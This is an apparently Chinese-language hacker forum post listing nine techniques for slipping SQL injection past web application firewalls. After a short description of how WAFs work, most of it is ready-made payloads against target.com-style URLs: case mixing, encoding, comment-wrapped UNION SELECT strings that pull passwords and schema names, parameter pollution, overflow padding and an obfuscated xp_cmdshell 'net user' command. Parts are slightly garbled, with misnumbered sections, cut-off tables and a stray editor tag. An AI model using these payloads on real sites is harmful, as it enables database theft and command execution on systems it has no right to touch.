標題：SQL注入9種繞過WAF方法

[taibeihacker]

SQL注入9種繞過WAF方法

0x01前言​

WAF區別於常規防火牆是因為WAF能夠過濾特定Web應用程序的內容，而常規防火牆則充當服務器之間的防禦門。通過檢查HTTP的流量，它可以防禦Web應用安全漏洞，如阻止來自SQL注入、跨站點腳本（XSS）、文件包含和安全配置錯誤。

0x02 WAF工作原理​

§ 檢測異常協議：拒絕不符合HTTP標準的請求
§ 增強型的輸入驗證：代理和服務器端驗證，而不僅僅是客戶端驗證
§ 白名單和黑名單
§ 基於規則和異常的保護：基於規則的更多是基於黑色的機制和更靈活的異常
§ 狀態管理：防禦會話保護(Cookie保護，反入侵規避技術，響應監控和信息披露保護)。

0x03 绕过WAF​

1.混合的CaseChange恶意输入會觸發WAF保護，如果WAF使用區分大小寫的黑名單，則更改大小寫可能會繞過該過濾器。
http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
2.替换关键字（插入將被WAF刪除的特殊字符）---SELECT可能變為SEL ECT，一旦刪除特殊字符，它將用SELECT執行
http://target.com/index.php?page_id=-15nbsp;UNIunionON SELselectECT 1,2,3,4
3.编码page.php?id=1%252f%252a*/UNION%252f%252a
/SELECT
十六进制编码：target.com/index.php?page_id=-15
/*!u%6eion*//*!se%6cect*/1,2,3,4… SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
Unicode 编码:?id=10%D6‘%20AND%201=2%23 SELECT
'Ä'='A'; #1
4.在攻击字符串中使用注释-----插入注释。例如/*！ SELECT * /可能會被WAF忽略，但傳遞給目標應用程序是由mysql數據庫處理。
index.php?page_id=-15
%55nION/**/%53ElecT 1,2,3,4
'union%a0select pass from users#
index.php?page_id=-15
/*!UNION*//*!SELECT*/1,2,3
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…
5.等效函数和命令----由於檢測到關鍵字，因此無法使用某些函數或命令，但在很多情況下，我們可以使用它們的等效或類似代碼。
hex()、bin()==
ascii()
sleep()==benchmark()
concat_ws()==group_concat()
substr((select 'password'),1,1)
=0x70
strcmp(left('password',1),
0x69)=1
strcmp(left('password',1),
0x70)=0
strcmp(left('password',1),
0x71)=-1
mid()、substr()
==substring()
@@user==user()
@@datadir==datadir()
5.特殊符号-----特殊符號具有特殊的含義和用法
+ ` symbol: select `version()`;
+ +- :select+id-1+1.from users;
+ @:select@^1.from users;
+Mysql function() as xxx
+`、~、@、%、()、[]、-、+ 、|、%00
Example:
'se’+’lec’+’t’
%S%E%L%E%C%T 1
1.aspx?id=1;EXEC(‘ma’+'ster.x’+'p_cm’+'dsh’+'ell
”net user”’)
' or --+2=- -!'2
id=1+(UnI)(oN)+(SeL)(EcT)
7.HTTP参数污染------提供多個parameter=value的值集來混淆繞過WAF。鑑於http://example.com?id=1?id='或'1'='1' - '在某些情況下（例如使用Apache/PHP），應用程序將僅解析最後一個（第二個） id=， WAF只解析第一個id=。這似乎是一個合理的請求，但應用程序仍然接收並處理惡意輸入。今天的大多數WAF都不容易受到HTTP參數污染（HPP）的影響，但仍然值得一試。
HPP（HTTP参数解析）：/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1amp;id=2,3+from+users+where+id=1—
/?id=1/**/union/*amp;id=*/select/*amp;id=*/pwd/*amp;id=*/from/*amp;id=*/usersHPP也被稱為重複參數污染，最簡單的是：uid=1＆uid=2＆uid
=3，對於這種情況，不同的Web服務器處理如下：

HPF（HTTP参数分段）：此方法是HTTP分段注入，與CRLF類似（使用控製字符％0a，％0d等執行換行符）
/?a=1+union/*amp;b=*/select+1,pass/*amp;c=*/from+users--
select * from table where a=1
union/* and b=*/select 1,pass/* limit */from users--
HPC（HTTP参数污染）:
RFC2396定義了以下字符：
Unreserved: a-z, A-Z, 0-9 and _
. ~ * ' ()
Reserved :/? @ amp;
=+ $ ,
Unwise : { } | \ ^ [ ] `
不同的Web服務器處理過程在構造特殊請求時有不同的邏輯：

對於魔術字符％，Asp/Asp.net將受到影響

8.缓冲区溢出---WAF始終是應用程序，容易受到與其他應用程序相同的軟件缺陷的影響。如果出現緩衝區溢漏洞可能會導致WAF崩潰，即使它不會導致代碼執行也可能會導致WAF正常運行。
?id=1 and (select 1)=(Select
0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
9. IntegrationIntegration意味著使用各種bypass技術，單一技術可能無法繞過過濾機制，但使用各種技術混合可能性會增加很多。
target.com/index.php?page_id=-15+and+(select
1)=(Select0xAA[.(add about 1000
'A').])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…
id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM
/*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
參考鏈接：https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/
wiz_tmp_tag id='wiz-table-range-border' contenteditable='false' style='display: none;'